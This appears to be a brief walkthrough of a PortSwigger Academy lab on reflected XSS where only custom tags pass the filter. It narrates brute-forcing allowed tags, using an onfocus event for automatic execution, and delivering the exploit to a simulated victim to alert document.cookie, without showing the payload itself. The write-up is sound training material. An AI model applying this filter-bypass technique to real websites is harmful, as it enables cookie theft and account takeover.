Solving Portswigger Academy: Reflected XSS into HTML context with all tags blocked except custom ones
This lab blocks all HTML tags except custom ones.
To solve the lab, perform a cross-site scripting attack that injects a custom tag and automatically alerts
document.cookie.
So let’s access the lab and you will see the search box.I first use img tag to test but I received “tag no allowed” in response.
Then I brute force the tags using intruder and found below tags are allowed.
As lab says about the custom tag I decided to use it.Then I searched for event that do not require user interaction. The portswigger XSS cheat sheet shows onfocus does not require interaction.
Let’s first test above payload for alert box.
I used it within I frame, but I am unable to get the iframe, when I stored and view it on exploit server iframe is not loading.
Let’s use script tag instead and it works.
Let’s deliver it to the victim. And it solved the lab.
